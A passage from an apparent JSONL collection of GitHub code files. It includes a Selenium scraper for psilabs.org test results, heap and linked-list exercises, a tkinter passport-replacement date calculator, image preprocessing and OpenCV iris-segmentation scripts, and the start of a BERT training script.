folder to save the downloaded pages.')\nargs = parser.parse_args()\n\ndef log_this(msg, verbosity=3, override=False):\n\tif verbosity <= args.verbose or override:\n\t\tif verbosity == 1:\n\t\t\tprint('INFO {}'.format(msg))\n\t\telif verbosity == 2:\n\t\t\tprint('DETAIL {}'.format(msg))\n\t\telif verbosity == 3:\n\t\t\tprint('DEBUG {}'.format(msg))\n\nlog_this('loading configs', 1)\n\ndef open_newtab(url=args.newtab_url, delay=0.05, max_tries=100):\n\tglobal browser\n\t'''Returns the window handle of the new tab.'''\n\twindows_before = set(browser.window_handles)\n\tbrowser.execute_script('window.open(\"{}\", \"_blank\");'.format(url))\n\tfor i in range(max_tries):\n\t\tnew_handles = windows_before ^ set(browser.window_handles)\n\t\tif len(new_handles) == 0:\n\t\t\ttime.sleep(delay)\n\t\telse:\n\t\t\treturn new_handles.pop()\n\ndef wait_for_element(xpath, timeout=600):\n\tglobal browser\n\ttry:\n\t\tselection = webdriver.support.ui.WebDriverWait(browser, timeout).until(\n\t\t\tselenium_webdriver_support_expectedConditions.presence_of_all_elements_located(\n\t\t\t\t(webdriver.common.by.By.XPATH,xpath)\n\t\t\t)\n\t\t)\n\texcept:\n\t\treturn False\n\treturn selection\n\ndef select_dropdown_option(dropdown_id, option_selector, fallback_text, verification_selector, timeout=60):\n\tglobal browser\n\tdropdown = browser.find_element_by_id(dropdown_id)\n\ttry:\n\t\tif type(dropdown) == webdriver.firefox.webelement.FirefoxWebElement:\n\t\t\tdropdown.click()\n\t\t\tdropdown_option = browser.find_element_by_xpath(option_selector)\n\t\t\tif type(dropdown_option) == 
webdriver.firefox.webelement.FirefoxWebElement:\n\t\t\t\tdropdown_option.click()\n\t\t\telse:\n\t\t\t\tinput(fallback_text)\n\texcept (selenium_common_exceptions_ElementNotInteractableException, selenium_common_exceptions_ElementClickInterceptedException) as e:\n\t\tinput(fallback_text)\n\tverification_element = wait_for_element(verification_selector, timeout)\n\tif verification_element:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef select_checkbox(checkbox_selector, fallback_text, verification_selector, timeout=60):\n\tglobal browser\n\tcheckbox = browser.find_element_by_xpath(checkbox_selector)\n\ttry:\n\t\tif type(checkbox) == webdriver.firefox.webelement.FirefoxWebElement:\n\t\t\tcheckbox.click()\n\t\telse:\n\t\t\tinput(fallback_text)\n\texcept (selenium_common_exceptions_ElementNotInteractableException, selenium_common_exceptions_ElementClickInterceptedException) as e:\n\t\tinput(fallback_text)\n\tverification_element = wait_for_element(verification_selector, timeout)\n\tif verification_element:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef write_to_csv(filepath, fieldnames, data):\n\tif os.path.exists(filepath):\n\t\twriteheader = False\n\telse:\n\t\twriteheader = True\n\twith open(filepath, 'a', encoding='utf-8') as writefile:\n\t\twritefile_writer = csv.DictWriter(writefile, fieldnames=fieldnames, lineterminator='\\n')\n\t\tif writeheader:\n\t\t\twritefile_writer.writeheader()\n\t\twritefile_writer.writerow(data)\n\nURL_sample_result = 'https://psilabs.org/results/test-results/show/'\ncounter = 1\nos.makedirs(args.save_path, exist_ok=True)\n\nslug = ''\nencountered_known_samples = 0\ntry:\n\toptions = webdriver.FirefoxOptions()\n\tif args.profile:\n\t\tprofile = webdriver.FirefoxProfile(profile_directory=args.profile)\n\t\toptions._profile = profile\n\toptions.set_preference('browser.link.open_newwindow',3)\n\toptions.set_preference('browser.link.open_newwindow.override.external',3)\n\toptions.set_preference('browser.link.open_newwindow.restriction',0)\n\tlog_this('starting browser', 1)\n\tif args.profile:\n\t\tbrowser=webdriver.Firefox(firefox_profile=profile, options=options)\n\telse:\n\t\tbrowser=webdriver.Firefox(options=options)\n\n\tbrowser.get('https://psilabs.org/results/test-results/?page=1')\n\tresults_list_loaded = wait_for_element(\n\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t)\n\tif not results_list_loaded:\n\t\texit('Could not load initial list.')\n\tcurrent_page = '0'\n\n\t# the following selectors (those with the numbers) are very likely to break soon\n\tselect_dropdown_option(\n\t\t'select_49',\n\t\t'//md-option[@value=\"dateTested\"][div[text()=\"Date Tested\"]]',\n\t\t'In the \"Filter\" pane please click on \"Sort By\" > \"Date Tested\". If you are done, press enter here to continue.',\n\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t)\n\n\tif args.check_newest:\n\t\tselect_dropdown_option(\n\t\t\t'select_53', #//md-input-container/md-select[md-select-value/span/div[starts-with(\"Desc\")]]\n\t\t\t'//md-option[@value=\"desc\"][div[text()=\"Desc\"]]',\n\t\t\t'In the \"Filter\" pane please click on \"Direction\" > \"Desc\". 
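The `write_to_csv` helper above appends rows and writes the header only when the file is first created. The same pattern in isolation; note that opening with `newline=''` is the documented way to avoid blank lines on Windows, as an alternative to forcing `lineterminator` (the file name and row here are illustrative):

```python
# Append-with-header-once CSV pattern, mirroring write_to_csv above.
import csv
import os

def append_row(filepath, fieldnames, row):
    write_header = not os.path.exists(filepath)
    with open(filepath, 'a', encoding='utf-8', newline='') as f:
        writer = csv.DictWriter(f, fieldnames=fieldnames)
        if write_header:
            writer.writeheader()
        writer.writerow(row)

append_row('failed_samples_demo.csv', ['Sample URL'],
           {'Sample URL': 'https://example.org/sample/1'})
```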
If you are done, press enter here to continue.',\n\t\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t\t)\n\telse:\n\t\tselect_dropdown_option(\n\t\t\t'select_53', #//md-input-container/md-select[md-select-value/span/div[starts-with(\"Asc\")]]\n\t\t\t'//md-option[@value=\"asc\"][div[text()=\"Asc\"]]',\n\t\t\t'In the \"Filter\" pane please click on \"Direction\" > \"Asc\". If you are done, press enter here to continue.',\n\t\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t\t)\n\n\tselect_checkbox(\n\t\t'//md-checkbox[@aria-label=\"Terpene Profile\"]',\n\t\t'In the \"Filter\" pane please click on \"TESTS INCLUDED\" > \"Terpene Profile\". If you are done, press enter here to continue.',\n\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t)\n\n\ttab_results_list = browser.window_handles[0]\n\tbrowser.switch_to.window(tab_results_list)\n\n\tlog_this('starting loop', 1)\n\twhile True:\n\t\traw_search_results = wait_for_element(\n\t\t\t'//sample-card/md-card/md-card-title/md-card-title-text/span/a'\n\t\t)\n\n\t\tprevious_page = current_page\n\t\tcurrent_url = urllib.parse.urlparse(browser.current_url)\n\t\tcurrent_page = urllib.parse.parse_qs(current_url.query)['page'][0]\n\n\t\tif raw_search_results:\n\t\t\tif current_page == previous_page:\n\t\t\t\tlog_this('Reached last page!', 1)\n\t\t\t\tbreak\n\t\telse:\n\t\t\tlog_this('Could not retrieve results page {}'.format(current_page), 1)\n\t\t\twrite_to_csv(os.path.join(args.save_path, 'failed_result_pages.csv'), ['Page URL'], {'Page URL':current_page})\n\t\t\tcontinue\n\n\t\tsample_urls = []\n\t\tfor search_result_element in raw_search_results:\n\t\t\tsearch_result_url = search_result_element.get_attribute('href')\n\t\t\tif search_result_url.startswith('https://psilabs.org/results/clients'):\n\t\t\t\tcontinue\n\t\t\tsample_urls.append(search_result_url)\n\t\tfor sample_url in sample_urls:\n\t\t\tif sample_url.startswith(URL_sample_result):\n\t\t\t\tslug = sample_url[len(URL_sample_result):]\n\t\t\telse:\n\t\t\t\twrite_to_csv(os.path.join(args.save_path, 'link_not_sample_or_provider.csv'), ['URL'], {'URL':sample_url})\n\t\t\tslug = re.sub(r'[^0-9A-Za-z]', '', slug)\n\t\t\tlog_this('Getting Sample {}'.format(sample_url), 1)\n\t\t\tif args.check_newest and os.path.exists(os.path.join(args.save_path, '{}.html'.format(slug))):\n\t\t\t\tencountered_known_samples += 1\n\t\t\t\tlog_this('Found existing sample {}'.format(slug), 1)\n\t\t\t\tif encountered_known_samples >= args.check_newest:\n\t\t\t\t\tbrowser.quit()\n\t\t\t\t\texit('Quitting')\n\t\t\tif not args.force_redownload and os.path.exists(os.path.join(args.save_path, '{}.html'.format(slug))):\n\t\t\t\tlog_this('Already exists: skipping.', 1)\n\t\t\t\tcontinue\n\t\t\ttab_result_page = open_newtab()\n\t\t\tbrowser.switch_to.window(tab_result_page)\n\t\t\ttime.sleep(args.wait_after_newtab)\n\t\t\tbrowser.get(sample_url)\n\t\t\t# SECOND TAB\n\t\t\tif len(wait_for_element('//md-content/div/md-card/md-card-header/md-card-header-text/span[@class=\"md-title\"][not(text()=\"\")]'))>1:\n\t\t\t\ttime.sleep(0.5)\n\t\t\telse:\n\t\t\t\tlog_this('Could not save sample {}'.format(sample_url), 1)\n\t\t\t\twrite_to_csv(os.path.join(args.save_path, 'failed_samples.csv'), ['Sample URL'], {'Sample URL':sample_url})\n\t\t\t\tcontinue\n\t\t\tfilename = os.path.join(args.save_path, '{}.html'.format(slug))\n\t\t\tcounter = 1\n\t\t\twhile os.path.exists(filename):\n\t\t\t\tcounter += 1\n\t\t\t\tfilename = os.path.join(args.save_path,'{}_{}.html'.format(slug, 
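The pagination check in the main loop relies on `urlparse` plus `parse_qs`; in isolation (the URL here is illustrative):

```python
# Reading the page number back out of the results URL, as the loop above does.
import urllib.parse

url = 'https://psilabs.org/results/test-results/?page=7'
query = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
page = query['page'][0]   # parse_qs returns a list per key
print(page)               # '7' -- a string, so compare before casting
```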
counter))\n\t\t\twith open(filename, 'w', encoding='utf-8') as sample_file:\n\t\t\t\tsample_file.write(browser.page_source)\n\t\t\tlog_this('Saved to file {}'.format(filename), 1)\n\t\t\t# SECOND TAB END\n\t\t\tbrowser.close()\n\t\t\tbrowser.switch_to.window(tab_results_list)\n\t\tlog_this('getting next results page', 1)\n\t\tbutton_next = browser.find_element_by_xpath('//page-selector/ul/li/button[md-icon[text()=\"chevron_right\"]]')\n\t\tbutton_next.click()\n\tbrowser.quit()\n\tlog_this('Finished!', 1, True)\nexcept KeyboardInterrupt as e:\n\tbrowser.quit()\n\texit('Last sample was {}'.format(slug))\n","repo_name":"Build-Week-MedCabinet/DS_Model_Engineering","sub_path":"Wrangling/web_scrapers/psilabs/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":9856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36800139293","text":"import heapq # 堆排序模块 q->queue 优先队列\nimport random\n\nli = list(range(10))\nrandom.shuffle(li) # 将列表打乱顺序\n\n# 建小根堆\nheapq.heapify(li)\n# print(li)\n\n# heappop 每次取堆的最小值\nn = len(li)\nfor i in range(n):\n print(heapq.heappop(li), end=\"\")\n","repo_name":"diaoyuqiang/python","sub_path":"算法/堆排序模块.py","file_name":"堆排序模块.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22469400835","text":"'''\n合并k个排序链表,并且返回合并后的排序链表。尝试分析和描述其复杂度。\n\n样例\n给出3个排序链表[2->4->null,null,-1->null],返回 -1->2->4->null\n'''\n\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\n# Methode1\nimport heapq\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n heap = []\n for node in lists:\n while node:\n heapq.heappush(heap, node.val)\n node = node.next\n \n temp = ListNode(-1)\n head = temp\n while heap:\n smallestNode_val = heapq.heappop(heap)\n temp.next = ListNode(smallestNode_val)\n temp = temp.next\n \n return head.next\n \n\n# Methode2\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n l = []\n for node in lists:\n while node:\n l.append(node.val)\n node = node.next\n l.sort()\n temp = ListNode(-1)\n head = temp\n for i in l:\n temp.next = ListNode(i)\n temp = temp.next\n \n return head.next","repo_name":"MUSK1881/lintcode-by-python","sub_path":"中等/104. Merge K Sorted Lists.py","file_name":"104. 
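For the merge-k-lists problem above, both methods flatten every value before sorting. The standard library can also do a lazy k-way merge of already-sorted sequences; a sketch on the sample input from the problem statement:

```python
# k-way merge of already-sorted value lists, as an alternative to pushing
# every value onto one heap (Method 1 above).
import heapq

lists = [[2, 4], [], [-1]]
merged = list(heapq.merge(*lists))
print(merged)  # [-1, 2, 4]
```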
Merge K Sorted Lists.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16502456376","text":"import re\nfrom datetime import datetime\nfrom tkinter import *\n\nfrom tkcalendar import DateEntry\n\nwindow = Tk()\nwindow.title(\"Когда менять паспорт\")\nwindow.geometry('380x550+760+250')\n\nlbl_description = Label(window,\n text=\"Данная программа поможет Вам рассчитать через какой промежуток времени Вам нужно поменять паспорт\",\n wraplength=390, justify=CENTER, padx=10, pady=10)\nlbl_input = Label(window, text=\"Для этого Вам необходимо ввести свои ФИО и дату рождения\", wraplength=390,\n justify=CENTER, padx=10, pady=10)\n\nlbl_name = Label(window, text=\"ФИО: \", wraplength=400)\n\n\ndef validate_username(username):\n result = re.match(\"[а-яА-ЯёЁ ]+$\", username) is not None\n if not result and len(username) <= 50:\n errmsg_name.set(\"Используйте только кириллицу\")\n else:\n errmsg_name.set(\"\")\n return result\n\n# def\ndef your_age(d_a, m_a, y_a, d_n, m_n, y_n):\n day_num_cal, month_num_cal, year_num_cal, now_day, now_month, now_year = d_a, m_a, y_a, d_n, m_n, y_n\n if now_month == month_num_cal:\n if now_day > day_num_cal:\n age = now_year - year_num_cal\n return age\n else:\n age = now_year - year_num_cal - 1\n return age\n elif now_month > month_num_cal:\n age = now_year - year_num_cal\n return age\n else:\n age = now_year - year_num_cal - 1\n return age\n\n\ndef after_replace(d_a, m_a, d_n, m_n):\n days_num = str(datetime(day=d_n, month=m_n, year=2022) - datetime(day=d_a, month=m_a, year=2022))\n days = days_num.split()[0]\n if days == \"0:00:00\":\n days = 0\n elif int(days) < 0:\n days = 365 + int(days)\n return days\n\n\ndef before_replace(d_a, m_a, y_a, d_n, m_n, your_ages):\n days_num = str(datetime(day=d_a, month=m_a, year=2022) - datetime(day=d_n, month=m_n, year=2022))\n days = days_num.split()[0]\n if days == \"0:00:00\":\n days = 0\n elif int(days) < 0:\n days = 365 + int(days)\n return days\n\n\ndef test1():\n global output\n fio_str = entry_name.get()\n fio = fio_str.split()\n if fio_str == \"\":\n errmsg_name.set(\"Введите ФИО\")\n elif len(fio) == 3:\n date2 = cal.get()\n month_num_cal = int(date2.split(\"/\")[0])\n day_num_cal = int(date2.split(\"/\")[1])\n if int(date2.split(\"/\")[2]) > 22:\n year_num_cal = int(\"19\" + date2.split(\"/\")[2])\n else:\n year_num_cal = int(\"20\" + date2.split(\"/\")[2])\n\n now = datetime.now()\n now_day = int(str(now).split()[0].split(\"-\")[2])\n now_month = int(str(now).split()[0].split(\"-\")[1])\n now_year = int(str(now).split()[0].split(\"-\")[0])\n old = datetime(day=day_num_cal, month=month_num_cal, year=year_num_cal)\n\n timedelta = now - old\n\n initials = str(fio[0].title()) + \" \" + str(fio[1][0].upper()) + \". \" + str(fio[2][0].upper())\n\n\n if timedelta.days <= 0:\n errmsg_date.set(\"Введите корректную дату\")\n else:\n errmsg_date.set(\"\")\n your_ages = your_age(day_num_cal, month_num_cal, year_num_cal, now_day, now_month, now_year)\n if your_ages > 45:\n output.set(\"Здравствуйте, \" + str(initials) + \". Вам больше не нужно менять паспорт.\")\n elif 18 < your_ages < 21:\n if your_ages >= 20:\n after = after_replace(day_num_cal, month_num_cal, now_day, now_month)\n if int(after) == 0:\n output.set(\"Здравствуйте, \" + str(initials) + \". До срока замены паспорта более года. 
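The branching in `your_age` above can be collapsed into a tuple comparison on `datetime.date`; a sketch with illustrative birthdays:

```python
# Compact age calculation: subtract a year if the birthday hasn't occurred yet.
from datetime import date

def age_on(birth: date, today: date) -> int:
    return today.year - birth.year - (
        (today.month, today.day) < (birth.month, birth.day))

print(age_on(date(1990, 5, 20), date(2022, 5, 19)))  # 31
print(age_on(date(1990, 5, 20), date(2022, 5, 20)))  # 32
```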
На данный момент вам не стоит беспокоиться по этому поводу.\")\n elif int(after) <= 90:\n count = - (int(after) - 90)\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"Если вы до сих пор не поменяли паспорт, сделайте это в ближайшем МФЦ. У Вас осталось \" + str(count) + \" дней на замену. Если вы не поменяете паспорт в течении этого времени, на Вас будет наложен штраф.\")\n else:\n count = int(after) - 90\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"Если вы до сих пор не поменяли паспорт, сделайте это в ближайшем МФЦ. У вас просрочка в \" + str(count) + \" дней. Не забудьте оплатить штраф.\")\n\n else:\n before = before_replace(day_num_cal, month_num_cal, year_num_cal, now_day, now_month, your_ages)\n if before == 0:\n output.set(\"С днём рождения, \" + str(initials) + \"! На данный момент вам \" + str(your_ages + 1) + \" лет. \" + \"Поменяйте паспорт в течении следующих 90 дней.\")\n else:\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"До замены паспорта осталось \" + str(before) + \" дней.\")\n\n elif 43 < your_ages < 46:\n if your_ages >= 45:\n after = after_replace(day_num_cal, month_num_cal, now_day, now_month)\n if int(after) == 0:\n output.set(\"Здравствуйте, \" + str(initials) + \". До срока замены паспорта более года. На данный момент вам не стоит беспокоиться по этому поводу.\")\n elif int(after) <= 90:\n count = - (int(after) - 90)\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"Если вы до сих пор не поменяли паспорт, сделайте это в ближайшем МФЦ. У Вас осталось \" + str(count) + \" дней на замену. Если вы не поменяете паспорт в течении этого времени, на Вас будет наложен штраф.\")\n else:\n count = int(after) - 90\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(your_ages) + \" лет. \" + \"Если вы до сих пор не поменяли паспорт, сделайте это в ближайшем МФЦ. У вас просрочка в \" + str(count) + \" дней. Не забудьте оплатить штраф.\")\n\n else:\n before = before_replace(day_num_cal, month_num_cal, year_num_cal, now_day, now_month, your_ages)\n if before == 0:\n output.set(\"С днём рождения, \" + str(initials) + \"! На данный момент вам \" + str(\n your_ages + 1) + \" лет. \" + \"Поменяйте паспорт в течении следующих 90 дней.\")\n else:\n output.set(\"Здравствуйте, \" + str(initials) + \". На данный момент вам \" + str(\n your_ages) + \" лет. \" + \"До замены паспорта осталось \" + str(before) + \" дней.\")\n else:\n output.set(\"Здравствуйте, \" + str(\n initials) + \". До срока замены паспорта более года. 
На данный момент вам не стоит беспокоиться по этому поводу.\")\n\n\n\n else:\n errmsg_name.set(\"Некорректные данные\")\n\ncheck = (window.register(validate_username), \"%P\")\n\nerrmsg_name = StringVar()\nerrmsg_date = StringVar()\n\nentry_name = Entry(window, validate=\"key\", validatecommand=check, width=40)\n\nlbl_error_name = Label(foreground=\"red\", textvariable=errmsg_name, wraplength=250)\nlbl_error_date = Label(foreground=\"red\", textvariable=errmsg_date, wraplength=250)\n\nlbl_date = Label(window, text=\"Дата рождения: \")\n\ncal = DateEntry(window, selectmode='day', background=\"#AAA\")\n\nbtn_calculation = Button(window, text=\"Произвести рассчет\", relief=GROOVE, command=test1)\n\noutput = StringVar()\noutput.set(\"Здесь будет результат\")\nlbl_output = Label(window, textvariable=output, wraplength=250)\n\nlbl_description.grid(row=0, column=0, columnspan=2)\nlbl_input.grid(row=1, column=0, columnspan=2)\nlbl_name.grid(row=2, column=0, sticky=W, padx=10)\nentry_name.grid(row=2, column=1, sticky=W)\nlbl_error_name.grid(row=3, column=1, columnspan=1, sticky=W)\nlbl_date.grid(row=4, column=0, columnspan=1, sticky=W, padx=10)\ncal.grid(row=4, column=1, sticky=W)\nlbl_error_date.grid(row=5, column=1, columnspan=1, sticky=W)\nbtn_calculation.grid(row=6, column=0, columnspan=2, sticky=N, pady=30)\nlbl_output.grid(row=7, column=0, columnspan=2)\nwindow.mainloop()\n","repo_name":"KatyaOgareva/passport_replacement","sub_path":"passport_replacement.py","file_name":"passport_replacement.py","file_ext":"py","file_size_in_byte":9720,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14894794010","text":"\"\"\"\nScript that modifies segmentation mask with instances. Each color\nis converted to instance id and image is saved in the dame directory.\nDirectory structre:\nroot_dir\n set1\n raw.tif\n labeled.png\n ...\n set2\n raw.tif\n labeled.png\n ...\n\nUsage:\n preprocess_data.py --data-dir=\n\"\"\"\nimport os\n\nimport cv2\nimport numpy as np\nfrom docopt import docopt\nfrom tqdm import tqdm\n\n\ndef convert_colors_to_ids(color_mask):\n unique_colors = np.unique(color_mask.reshape(-1, color_mask.shape[2]), axis=0)\n\n ids_mask = np.zeros(color_mask.shape[:2])\n\n id_counter = 1\n for color in unique_colors:\n if not (color == [0, 0, 0]).all():\n instance = cv2.inRange(color_mask, color, color)\n ids_mask[np.where(instance > 0)] = id_counter\n id_counter += 1\n return ids_mask\n\n\ndef main():\n # args = docopt(__doc__)\n\n # data_dir = args['--data-dir']\n data_dir = '/home/davince/Dropbox (OIST)/Deeplearning_system/Mask-RCNN_OIST/val/'\n\n image_dirs = [os.path.join(data_dir, subdir) for subdir in os.listdir(data_dir)]\n for image_dir in tqdm(image_dirs):\n color_mask = cv2.imread(os.path.join(image_dir, 'labeled.png'))\n\n ids_mask = convert_colors_to_ids(color_mask)\n cv2.imwrite(os.path.join(image_dir, 'instances_ids.png'), ids_mask)\n\n\nif __name__ == '__main__':\n main()\n #\n # image = cv2.imread('/data/upwork/cells/instance_aware_seg/data/train/set1/labeled.png')\n # ids = convert_colors_to_ids(image)\n # cv2.imwrite('test.png', ids)\n","repo_name":"oist/Usiigaci","sub_path":"Mask R-CNN/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"21"} +{"seq_id":"37532314251","text":"f = open(\"phone_book.txt\", 'r')\nall = f.read()\nnumbers = all.split('\\n')\n\nfor i in numbers:\n y=list()\n 
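The color-to-instance-id conversion in `convert_colors_to_ids` above can be reproduced without OpenCV by masking on full-color equality; a tiny pure-NumPy sketch on a 2x2 mask (values invented):

```python
# Map each unique non-black color to an integer instance id, NumPy only.
import numpy as np

mask = np.array([[[0, 0, 0], [255, 0, 0]],
                 [[255, 0, 0], [0, 255, 0]]], dtype=np.uint8)
colors = np.unique(mask.reshape(-1, 3), axis=0)
ids = np.zeros(mask.shape[:2], dtype=np.int32)
next_id = 1
for color in colors:
    if (color == 0).all():                  # keep background as id 0
        continue
    ids[(mask == color).all(axis=2)] = next_id
    next_id += 1
print(ids)  # [[0 2] [2 1]] (ids follow np.unique's sort order)
```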
y.append(i.split('-'))\n\nmynumber = list()\nfor i in numbers:\n mynumber.append(i.split('-'))\n\nresult = list()\nfor (first, middle, last) in mynumber:\n if first == '010' and int(middle) > int(last):\n result.append(''.join(mynumber[x]))\n x=x+1\n\nanswer=list()\nfor i in result:\n answer.append(i+'\\n')\n\nf = open(\"new_phone_book.txt\", 'w')\nf.writelines(answer)\nf.close()\n\n\n\n","repo_name":"yunkio/Study_tobigs12","sub_path":"week1/과제/week1_3_윤기오.py","file_name":"week1_3_윤기오.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24341422951","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\n# ----------------- Hough circle transform ( circle detection ) ----------------- #\nIMAGE = 'iris.png'\n\n# arg 2 -> to read as a grey scale not RGB scale #\nimg = cv2.imread(IMAGE, 0)\nimg = cv2.medianBlur(img, 5) # improve result of circle detection #\n\n# from grey scale to RGB #\ncimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) # cv2 always work with grey scale to BGR #\n\n# arg 1 -> image. , arg 2 -> detection method (HOUGH_GRADIENT).\n# arg 3 -> dp : inverse ratio of the accumulator resolution to the image resolution.\n# arg 4 -> minDist : minimum distance between the centers of the detected circles.\n# arg 5 -> the higher threshold of the two passed to the Canny edge detector.\n# arg 6 -> the accumulator threshold for the circle centers at the detection stage.\n# arg 7 -> minimum circle radius.\n# arg 8 -> maximum circle radius.\ncircles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 50, param1=50, param2=30, minRadius=0, maxRadius=0)\n\ncircles = np.uint16(np.around(circles)) # convert all numbers to integers not float #\n\n# draw the detected circles\n# loop over all the detected circles\nfor i in circles[0, :]:\n # Draw the outer circle with Green color (you can chang the color with the 4th par `(0, 255, 0)` ) #\n cv2.circle(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)\n # Draw the center of the circle with Red color (you can chang the color with the 4th par `(0, 0, 255)` ) #\n cv2.circle(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)\n\ncv2.imshow('Circle Detection', cimg)\ncv2.imwrite('circle.jpg', cimg)\ncv2.waitKey(2000)\ncv2.destroyAllWindows()\n\n# ----------------- Thresholding ----------------- #\n\n# arg 2 -> to read as a grey scale not RGB scale #\nimg = cv2.imread(IMAGE, 0)\nimg = cv2.medianBlur(img, 5) # improve result of circle detection #\n# Binary Thresholding\n# converts the image into a binary image, where pixel values below the threshold (127 in this case) are set to 0\n# and values above the threshold are set to 255.\nret, BinaryThresholding = cv2.threshold(img, 90, 255, cv2.THRESH_BINARY)\n\n# Adaptive Mean\n# Adaptive thresholding calculates the threshold value for each pixel based on a local neighborhood around it.\n# The neighborhood size is specified as `(11, 2)`,\nAdaptiveThresholding = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2)\n\n# Adaptive Gaussian\n# threshold value is calculated as the weighted sum of the neighborhood pixels,\n# where the weights are determined by a Gaussian window.\nAdaptiveThresholdingGaussian = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n\n\ntitles = ['Original Image', 'Binary Threshold (v = 90)', 'Adaptive Mean', 'Adaptive Gaussian']\nimages = [img, BinaryThresholding, AdaptiveThresholding, AdaptiveThresholdingGaussian]\n\nfor i in 
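The filtering loop in the phone-book script above references `x` before it is ever assigned (a `NameError` at runtime) and rebuilds entries from re-joined split parts. A corrected sketch of the intended filter, keeping the original `first-middle-last` format (the sample numbers are mine):

```python
# Keep 010 numbers whose middle block is numerically larger than the last.
numbers = ['010-1234-0567', '011-111-222', '010-0001-9999']
result = []
for number in numbers:
    first, middle, last = number.split('-')
    if first == '010' and int(middle) > int(last):
        result.append(number)
print(result)  # ['010-1234-0567']
```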
range(4):\n plt.subplot(2, 2, i + 1), plt.imshow(images[i], 'gray')\n plt.title(titles[i])\n plt.xticks([]), plt.yticks([])\n\nplt.show()\n\n# ----------------- Segmentation (Final) ----------------- #\n\n# Read in the image 3\nimage = cv2.imread(IMAGE)\n\n# Change color to RGB (from BGR) #\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\nplt.imshow(image)\n\n# prepare the image data for the k-means clustering by Reshaping the image into\n# a 2D array of pixels and 3 color values (RGB). (create a new matrix)\n# `-1` for auto complete the new matrix shape.\n# `3` each pixel has three color channels.\npixel_vals = image.reshape((-1, 3))\n\n# Convert to float type to provide greater precision\n# and allows for more accurate calculations\npixel_vals = np.float32(pixel_vals)\n\n# the below line of code defines the criteria for the algorithm to stop running (to stop algo)\n# which will happen is 100 iterations are run or the epsilon (which is the required accuracy)\n# becomes 85% No. iterations required accuracy\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.85)\n\n# then perform k-means clustering wit h number of clusters defined as 3\n# also random centres are initially chose for k-means clustering\nk = 3\nretval, labels, centers = cv2.kmeans(pixel_vals, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)\n\n# calculate the new centers for each class (clustering)\n# convert data into 8-bit values\ncenters = np.uint8(centers)\nsegmented_data = centers[labels.flatten()]\n\n# reshape data into the original image dimensions (same like original)\n# draw the new image with same size of original photo\nsegmented_image = segmented_data.reshape(image.shape)\nprint(set(labels.flatten()))\ncv2.imshow(\"Segmented image\", segmented_image)\ncv2.imwrite('segmented_image.jpg', segmented_image)\ncv2.waitKey(2000)\n","repo_name":"mmsaeed509/Image-Processing","sub_path":"semester-3/IrisDetection/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69863041014","text":"import argparse\nimport os\nfrom posix import environ\n#os.environ['CUDA_VISIBLE_DEVICES']='5'\nfrom numpy.lib.arraypad import pad\nfrom tokenizers import InputSequence\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport math\nimport logging\nimport random\nfrom torch.cuda import check_error\nfrom tqdm import tqdm\nfrom str2bool import str2bool\nimport itertools\nfrom datetime import datetime\n\n#from zxlmetric import f1_metric\nfrom transformers import BertForSequenceClassification\nfrom transformers import BertModel\nfrom transformers import BertConfig\n\nfrom transformers import AdamW, BertTokenizer\nfrom transformers.optimization import get_linear_schedule_with_warmup\nfrom transformers.optimization import (\n get_cosine_with_hard_restarts_schedule_with_warmup,\n get_cosine_schedule_with_warmup,\n get_constant_schedule,\n get_constant_schedule_with_warmup,\n get_polynomial_decay_schedule_with_warmup\n)\nfrom torch.utils.data import DataLoader, Dataset\nimport 